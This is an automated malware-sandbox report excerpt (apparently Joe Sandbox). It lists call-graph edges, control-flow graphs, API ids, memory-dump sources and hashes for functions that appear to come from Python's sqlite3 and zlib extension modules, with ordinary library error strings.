9953->9948 9955 7ff8e7514ad5 9954->9955 9957 7ff8e7514b29 9955->9957 9958 7ff8e7514d40 9955->9958 9957->9951 9959 7ff8e751c95c 00007FF8E76ACD40 9958->9959 9960 7ff8e7514d6c 9958->9960 9959->9960 9960->9957 9961 7ff8e75470b0 9964 7ff8e75470e4 9961->9964 9962 7ff8e7553260 2 API calls 9963 7ff8e754718f 9962->9963 9964->9962 10091 7ff8e7541bb0 10092 7ff8e7541dda 10091->10092 10095 7ff8e7541bf2 10091->10095 10093 7ff8e7553260 2 API calls 10094 7ff8e7541daf 10093->10094 10095->10092 10095->10093 9965 7ff8e75504b0 9966 7ff8e7550503 9965->9966 9967 7ff8e755067e 9966->9967 9968 7ff8e7550664 9966->9968 9969 7ff8e75505b9 9966->9969 9979 7ff8e755146c 9967->9979 9968->9969 9972 7ff8e7551370 9968->9972 9973 7ff8e7555ade 9972->9973 9974 7ff8e755139f 9972->9974 9978 7ff8e75513bb 9974->9978 9984 7ff8e75513f8 9974->9984 9976 7ff8e7553260 2 API calls 9977 7ff8e75513e2 9976->9977 9977->9969 9978->9976 9980 7ff8e755149e 9979->9980 9981 7ff8e7553260 2 API calls 9980->9981 9983 7ff8e7555b3c 9980->9983 9982 7ff8e75514eb 9981->9982 9982->9969 9985 7ff8e7551412 9984->9985 9986 7ff8e75475d0 2 API calls 9985->9986 9987 7ff8e7551434 9985->9987 9986->9987 9987->9978 10096 7ff8e7553bb0 IsProcessorFeaturePresent 10097 7ff8e7553bd6 10096->10097 10098 7ff8e7553be4 00007FF8F9D619C0 RtlCaptureContext RtlLookupFunctionEntry 10097->10098 10099 7ff8e7553c1e RtlVirtualUnwind 10098->10099 10100 7ff8e7553c5a 00007FF8F9D619C0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10098->10100 10099->10100 10101 7ff8e7553cde 10100->10101 9908 7ff8e75520bc 9909 7ff8e75520e8 9908->9909 9910 7ff8e755219a 9909->9910 9911 7ff8e755216f 00007FF8F9D619C0 9909->9911 9911->9910 10061 7ff8e75487b8 10063 7ff8e754885b 10061->10063 10064 7ff8e75487f8 10061->10064 10064->10063 10065 7ff8e7551888 10064->10065 10067 7ff8e75518a5 10065->10067 10066 7ff8e7551978 10066->10064 10067->10066 10068 7ff8e755194d 00007FF8F9D619C0 10067->10068 10068->10066 10102 7ff8e751697c 10103 7ff8e751680f 10102->10103 10104 7ff8e7516828 00007FF906026A30 10103->10104 10108 7ff8e75168a0 10103->10108 10105 7ff8e7516846 00007FF906026A30 10104->10105 10104->10108 10106 7ff8e7516864 00007FF906026A30 10105->10106 10105->10108 10107 7ff8e7516882 00007FF906026A30 10106->10107 10106->10108 10107->10108 9765 7ff8e7547ffc 9766 7ff8e7548034 00007FF8F9D619C0 9765->9766 9767 7ff8e7548063 9765->9767 9766->9767 9769 7ff8e75480b9 9767->9769 9770 7ff8e75493ec 9767->9770 9771 7ff8e754941f 9770->9771 9773 7ff8e7549442 9771->9773 9774 7ff8e7547df8 9771->9774 9773->9769 9776 7ff8e7547e37 9774->9776 9777 7ff8e7547e4d 9776->9777 9778 7ff8e7548190 9776->9778 9777->9773 9780 7ff8e75481cb 9778->9780 9781 7ff8e754823d 9780->9781 9782 7ff8e754855c 9780->9782 9781->9777 9783 7ff8e7548577 9782->9783 9784 7ff8e7548692 9783->9784 9786 7ff8e7548ea0 9783->9786 9784->9780 9787 7ff8e7548ee2 9786->9787 9788 7ff8e7548f2b 9787->9788 9790 7ff8e7548fac 9787->9790 9788->9784 9794 7ff8e754901a 9790->9794 9792 7ff8e7549082 9792->9788 9793 7ff8e754919f 9793->9788 9796 7ff8e7549072 9794->9796 9797 7ff8e7545a38 9794->9797 9796->9793 9801 7ff8e7553260 9796->9801 9799 7ff8e7545a62 9797->9799 9798 7ff8e7545b7f 9798->9796 9799->9798 9808 7ff8e75475d0 9799->9808 9802 7ff8e7553269 9801->9802 9803 7ff8e7553614 IsProcessorFeaturePresent 9802->9803 9804 7ff8e7553274 9802->9804 9805 7ff8e755362c 9803->9805 9806 7ff8e7553633 capture_previous_context 9803->9806 9804->9792 9805->9806 9807 7ff8e75536e1 9806->9807 9807->9792 9811 7ff8e754760d 9808->9811 9809 7ff8e7553260 2 API calls 9810 7ff8e75476b0 9809->9810 9810->9798 9811->9809 9812 7ff8e7554842 9811->9812 9843 7ff8e75112c0 9844 7ff8e75112ed 9843->9844 9846 7ff8e7511320 9843->9846 9844->9846 9847 7ff8e75151a0 9844->9847 9846->9846 9848 7ff8e75151e7 9847->9848 9856 7ff8e75155d1 9847->9856 9849 7ff8e7515240 00007FF8E76ACD40 9848->9849 9854 7ff8e7515254 9848->9854 9848->9856 9849->9854 9849->9856 9850 7ff8e751b020 3 API calls 9852 7ff8e75156a1 9850->9852 9852->9846 9853 7ff8e75153e7 00007FF8E73C6B10 9853->9854 9854->9853 9854->9856 9857 7ff8e7515749 00007FF8E73C6B10 9854->9857 9858 7ff8e7516240 9854->9858 9861 7ff8e7516fd0 9854->9861 9856->9850 9857->9854 9859 7ff8e7516264 00007FF8E76ACD40 9858->9859 9860 7ff8e7516257 9858->9860 9859->9860 9860->9854 9862 7ff8e7516ff8 9861->9862 9863 7ff8e75170a1 00007FF906026A30 9862->9863 9867 7ff8e7517107 9862->9867 9864 7ff8e75170c1 00007FF906026A30 9863->9864 9863->9867 9865 7ff8e75170d8 00007FF906026A30 9864->9865 9864->9867 9866 7ff8e75170ef 00007FF906026A30 9865->9866 9865->9867 9866->9867 9867->9854 10109 7ff8e7514f80 10110 7ff8e751517e 10109->10110 10111 7ff8e7514fa7 10109->10111 10111->10110 10112 7ff8e75150d2 00007FF8E76ACD40 10111->10112 10114 7ff8e7515052 10111->10114 10116 7ff8e75150ee 10112->10116 10113 7ff8e75151a0 11 API calls 10115 7ff8e7515072 10113->10115 10114->10113 9883 7ff8e7551040 9885 7ff8e755106a 9883->9885 9884 7ff8e7551140 9885->9884 9886 7ff8e75475d0 2 API calls 9885->9886 9886->9884 9992 7ff8e7552c80 9993 7ff8e7552c88 9992->9993 9995 7ff8e7552cd8 9993->9995 9996 7ff8e7548364 9993->9996 9999 7ff8e75483a5 9996->9999 9997 7ff8e7548457 9997->9995 9998 7ff8e754855c 2 API calls 9998->9999 9999->9997 9999->9998 10035 7ff8e7517504 10036 7ff8e7517557 10035->10036 10037 7ff8e7517526 10035->10037 10037->10036 10039 7ff8e75175b0 10037->10039 10041 7ff8e75175c3 10039->10041 10040 7ff8e751765e 00007FF8E73C6B10 10040->10040 10040->10041 10041->10040 10042 7ff8e751769d 10041->10042 10042->10036 9891 7ff8e7553808 9892 7ff8e7553821 9891->9892 9893 7ff8e7553811 9891->9893 9893->9892 9894 7ff8e755381b DisableThreadLibraryCalls 9893->9894 9894->9892 9919 7ff8e75130cd 9922 7ff8e751313e 9919->9922 9920 7ff8e751b020 3 API calls 9921 7ff8e7513222 9920->9921 9922->9920 9813 7ff8e7512650 9815 7ff8e7512695 9813->9815 9818 7ff8e7512773 9815->9818 9820 7ff8e75128b0 9815->9820 9817 7ff8e751278b 9819 7ff8e751c33e 9818->9819 9825 7ff8e751b020 9818->9825 9819->9819 9821 7ff8e75128f6 9820->9821 9822 7ff8e7512a56 00007FF8E76ACD40 9821->9822 9823 7ff8e7512a7e 9821->9823 9822->9823 9824 7ff8e7512a6a 00007FF8E76ACD40 9822->9824 9823->9818 9824->9823 9826 7ff8e751b029 9825->9826 9827 7ff8e751b034 9826->9827 9828 7ff8e751b3d4 IsProcessorFeaturePresent 9826->9828 9827->9817 9829 7ff8e751b3ec 9828->9829 9832 7ff8e751b4a8 RtlCaptureContext 9829->9832 9831 7ff8e751b3ff 9831->9817 9833 7ff8e751b4c2 RtlLookupFunctionEntry 9832->9833 9834 7ff8e751b4d8 capture_previous_context 9833->9834 9835 7ff8e751b511 9833->9835 9834->9833 9834->9835 9835->9831 10043 7ff8e7516910 10044 7ff8e751681c 10043->10044 10048 7ff8e75168a0 10043->10048 10045 7ff8e7516828 00007FF906026A30 10044->10045 10044->10048 10046 7ff8e7516846 00007FF906026A30 10045->10046 10045->10048 10047 7ff8e7516864 00007FF906026A30 10046->10047 10046->10048 10047->10048 10049 7ff8e7516882 00007FF906026A30 10047->10049 10049->10048 10072 7ff8e75135d0 10073 7ff8e7514ac0 00007FF8E76ACD40 10072->10073 10074 7ff8e75135ec 10073->10074 10075 7ff8e7518fd0 10076 7ff8e7518ff2 10075->10076 10077 7ff8e751d47c 00007FF8E76ACD40 10076->10077 10078 7ff8e7519089 10076->10078 10077->10078 9895 7ff8e7545814 9896 7ff8e754583a 9895->9896 9897 7ff8e7545868 9895->9897 9896->9897 9898 7ff8e754585b 00007FF8F9D619C0 9896->9898 9898->9897

                                                            Executed Functions

                                                            Function 00007FF8E75166F0 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 193COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 173 7ff8e75166f0-7ff8e751670d 174 7ff8e751671e-7ff8e7516722 173->174 175 7ff8e751670f-7ff8e7516718 call 7ff8e751e1b8 173->175 177 7ff8e7516728-7ff8e751672d 174->177 178 7ff8e751cee7-7ff8e751cf08 call 7ff8e751e1c0 call 7ff8e751e210 174->178 175->174 185 7ff8e751cec0-7ff8e751cee2 call 7ff8e751e1b8 call 7ff8e751e4b8 175->185 181 7ff8e7516ae1-7ff8e7516af6 call 7ff8e751e4d8 177->181 182 7ff8e7516733-7ff8e7516736 177->182 181->185 186 7ff8e751673c-7ff8e7516753 call 7ff8e751e120 182->186 187 7ff8e7516a21-7ff8e7516a33 call 7ff8e751e490 182->187 199 7ff8e7516939-7ff8e751693b 185->199 186->199 200 7ff8e7516759-7ff8e7516773 call 7ff8e751e470 186->200 187->186 197 7ff8e7516a39 187->197 197->199 202 7ff8e75168db-7ff8e75168eb 199->202 200->199 205 7ff8e7516779-7ff8e751679e call 7ff8e751e708 200->205 208 7ff8e7516a84-7ff8e7516a98 call 7ff8e751e4d8 205->208 209 7ff8e75167a4-7ff8e75167ab 205->209 208->199 209->209 211 7ff8e75167ad-7ff8e75167b0 209->211 213 7ff8e7516a08-7ff8e7516a1c call 7ff8e751e4d8 211->213 214 7ff8e75167b6-7ff8e75167df call 7ff8e751e468 call 7ff8e751e758 211->214 213->199 220 7ff8e75167e5-7ff8e75167f2 call 7ff8e751e238 214->220 223 7ff8e75167f8-7ff8e7516809 220->223 224 7ff8e751692e-7ff8e7516934 call 7ff8e75163e0 220->224 226 7ff8e751680f-7ff8e7516816 223->226 227 7ff8e7516940-7ff8e7516946 223->227 224->199 228 7ff8e751681c-7ff8e7516822 226->228 229 7ff8e75168a0-7ff8e75168b3 call 7ff8e751e218 226->229 230 7ff8e7516958-7ff8e751695e 227->230 231 7ff8e7516948-7ff8e7516951 227->231 232 7ff8e7516828-7ff8e7516840 00007FF906026A30 228->232 233 7ff8e75168ec-7ff8e75168f2 228->233 244 7ff8e75168b9-7ff8e75168d8 call 7ff8e751e1a0 229->244 245 7ff8e75169be-7ff8e75169ce call 7ff8e751e7b0 229->245 236 7ff8e75169aa-7ff8e75169b8 call 7ff8e751e4d8 230->236 237 7ff8e7516960-7ff8e7516974 230->237 231->227 235 7ff8e7516953 231->235 238 7ff8e7516924-7ff8e7516929 232->238 239 7ff8e7516846-7ff8e751685e 00007FF906026A30 232->239 233->232 242 7ff8e75168f8-7ff8e751690b 233->242 236->245 237->236 238->229 239->238 243 7ff8e7516864-7ff8e751687c 00007FF906026A30 239->243 242->238 243->238 246 7ff8e7516882-7ff8e751689a 00007FF906026A30 243->246 244->202 245->202 246->229 246->238
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                            • API String ID: 4164062812-3639599724
                                                            • Opcode ID: f5273bdf54cb06cd5d538bbbb3c294481d673bae0095213b7163fced7fe1f5f9
                                                            • Instruction ID: 2dc056f42cfdf6ea4c460d9cce074c6637a915f5161bac8b3554b6cc33a2ee52
                                                            • Opcode Fuzzy Hash: f5273bdf54cb06cd5d538bbbb3c294481d673bae0095213b7163fced7fe1f5f9
                                                            • Instruction Fuzzy Hash: D1917A25A08E4382FB608FA2EC5477C67A0EF44BC7F544436D96E476A9DF2CE589C302
                                                            Function 00007FF8E75151A0 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 615COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$executemany() can only execute DML statements.
                                                            • API String ID: 3568877910-2731538448
                                                            • Opcode ID: ee0d8454c5c9d970da0218faf46479518938e162efa0cbd301689f1702c18be9
                                                            • Instruction ID: 4429ffb3cbd051df525ce82934f92c307ac4858e505855ae84b6dc0564784075
                                                            • Opcode Fuzzy Hash: ee0d8454c5c9d970da0218faf46479518938e162efa0cbd301689f1702c18be9
                                                            • Instruction Fuzzy Hash: 66521336A08E4286EB549FA5E85433C63A0FF85BD7F240435CA2E476A4DF3DE885D742
                                                            Function 00007FF8E75128B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 200COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 570 7ff8e75128b0-7ff8e75128f8 call 7ff8e751e140 573 7ff8e75128fe-7ff8e751290e call 7ff8e751e160 570->573 574 7ff8e7512bbf-7ff8e7512bc4 570->574 573->574 578 7ff8e7512914-7ff8e751291b 573->578 576 7ff8e7512b7d-7ff8e7512ba0 574->576 579 7ff8e7512921-7ff8e7512955 call 7ff8e751e468 call 7ff8e751e770 578->579 580 7ff8e7512bc6-7ff8e7512bdb call 7ff8e7511664 578->580 587 7ff8e751295b-7ff8e751295f 579->587 590 7ff8e751c344-7ff8e751c347 580->590 588 7ff8e751297b-7ff8e751298d call 7ff8e751e238 587->588 589 7ff8e7512961-7ff8e7512975 call 7ff8e751e798 587->589 598 7ff8e751298f call 7ff8e751e100 588->598 599 7ff8e7512995-7ff8e751299d 588->599 589->588 593 7ff8e751c34d-7ff8e751c354 call 7ff8e751e190 590->593 594 7ff8e75129a3-7ff8e75129c2 call 7ff8e751e1c0 call 7ff8e751e210 590->594 593->574 605 7ff8e75129c8-7ff8e75129e2 call 7ff8e751e458 594->605 606 7ff8e7512ba1-7ff8e7512bac call 7ff8e75163e0 594->606 598->599 599->590 599->594 610 7ff8e7512bb1-7ff8e7512bb9 call 7ff8e751e750 605->610 611 7ff8e75129e8-7ff8e7512a13 call 7ff8e751e130 605->611 606->610 610->574 615 7ff8e751c359-7ff8e751c35f call 7ff8e751e100 611->615 616 7ff8e7512a19-7ff8e7512a1c 611->616 624 7ff8e751c365-7ff8e751c369 615->624 616->610 618 7ff8e7512a22-7ff8e7512a42 call 7ff8e751e130 616->618 622 7ff8e7512a4d-7ff8e7512a50 618->622 623 7ff8e7512a44-7ff8e7512a47 call 7ff8e751e100 618->623 622->610 627 7ff8e7512a56-7ff8e7512a64 00007FF8E76ACD40 622->627 623->622 624->610 625 7ff8e751c36f-7ff8e751c372 624->625 628 7ff8e751c390-7ff8e751c397 call 7ff8e751e100 625->628 627->624 629 7ff8e7512a6a-7ff8e7512a78 00007FF8E76ACD40 627->629 628->610 630 7ff8e7512a7e-7ff8e7512b72 call 7ff8e751e1b8 call 7ff8e751e140 629->630 631 7ff8e751c374-7ff8e751c378 629->631 630->574 642 7ff8e7512b74-7ff8e7512b7b 630->642 633 7ff8e751c37a-7ff8e751c37d call 7ff8e751e100 631->633 634 7ff8e751c383-7ff8e751c387 631->634 633->634 634->610 638 7ff8e751c38d 634->638 638->628 642->576
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: sqlite3.connect$sqlite3.connect/handle
                                                            • API String ID: 3568877910-789065793
                                                            • Opcode ID: f65f1b4aa8fab3d01ff863b74949dc8337d09ceb04be27526f80d31c3e7b3a06
                                                            • Instruction ID: 51842e802e42ed75141cf6c499819fb2b99d5b6b8eeba0343fecdd910dc84286
                                                            • Opcode Fuzzy Hash: f65f1b4aa8fab3d01ff863b74949dc8337d09ceb04be27526f80d31c3e7b3a06
                                                            • Instruction Fuzzy Hash: EEA1FE36A09F8286EB608FA5E88436D73A4FB49BD6F144535CEAE42758DF3DE444C702
                                                            Function 00007FF8E7547FFC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007D619
                                                            • String ID: argument 'data'$contiguous buffer$decompress
                                                            • API String ID: 1596299418-2667845042
                                                            • Opcode ID: 6f5a67f52f9f9f4db097372ad2f0ef7fa7d88bdcbbd3075795eb13141a983109
                                                            • Instruction ID: 689e2425fbba3dcd7dc71458656ef0a062ee1df0ea74399e0ed3295dc46bab7a
                                                            • Opcode Fuzzy Hash: 6f5a67f52f9f9f4db097372ad2f0ef7fa7d88bdcbbd3075795eb13141a983109
                                                            • Instruction Fuzzy Hash: B5415C21A18B8282EA108B92EC4437D63A4FB49BD4F485136DE7E17B94EF3DF545C742

                                                            Non-executed Functions

                                                            Function 00007FF8E7553BB0 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007D619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 4166452831-0
                                                            • Opcode ID: 20b3d6c6e0832c53b5da1da8faa77a9c607007c578d0bea065c04d4a4ef01c4f
                                                            • Instruction ID: 408221948a4e08775155709377eab43b1892634c8d9443c509ed86a9c3bcae1e
                                                            • Opcode Fuzzy Hash: 20b3d6c6e0832c53b5da1da8faa77a9c607007c578d0bea065c04d4a4ef01c4f
                                                            • Instruction Fuzzy Hash: CE310A72609EC18AEB609FA1E8507ED73A4FB84788F44443ADA5E47B94DF3CD548C711
                                                            Function 00007FF8E751B970 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 73110fe95f56f2e246e2a39845b86ad545e02ac88c3586a09d39c753f47919d1
                                                            • Instruction ID: 94c5ff5346cb3bdd2050ff58380d2ced86076ad3d08f2cff8f20b8cd0d76ed8e
                                                            • Opcode Fuzzy Hash: 73110fe95f56f2e246e2a39845b86ad545e02ac88c3586a09d39c753f47919d1
                                                            • Instruction Fuzzy Hash: BF313D72609F828AEB609FA0E8507ED73A0FB84786F44443ADA5D47B98DF3CD648C711
                                                            Function 00007FF8E7516FD0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
                                                            • API String ID: 4164062812-1845899854
                                                            • Opcode ID: 85670fe99c256b4035ecc5ad04d73d73287a94dcff575db1ead4e4b6bb150e32
                                                            • Instruction ID: 0ed2d924cab7fd0acbe338b176641b51ddb16840700a41a9c4d2a60a1e07ab9f
                                                            • Opcode Fuzzy Hash: 85670fe99c256b4035ecc5ad04d73d73287a94dcff575db1ead4e4b6bb150e32
                                                            • Instruction Fuzzy Hash: 8C515C21A08E5382FA149BA6EC5477DA3A1AF84BD3F180535DD2E477A4DF3CE446C742
                                                            Function 00007FF8E751B040 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 349153199-0
                                                            • Opcode ID: f75ecc2d8c1b9a871e020600fca4442604da94269eddfc7fb5995d09ef7590c1
                                                            • Instruction ID: 279a38671e0ffa4cdf88f3e6cef166f863abd215cd789ccd78e542746945c792
                                                            • Opcode Fuzzy Hash: f75ecc2d8c1b9a871e020600fca4442604da94269eddfc7fb5995d09ef7590c1
                                                            • Instruction Fuzzy Hash: B181BD61E0CA8786FA50ABE6DC413BD62A1AF957C2F154435DA3C437A2DF3DE8468703
                                                            Function 00007FF8E7514F80 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$argument 1$execute$factory must return a cursor, not %.100s$str
                                                            • API String ID: 3568877910-652842647
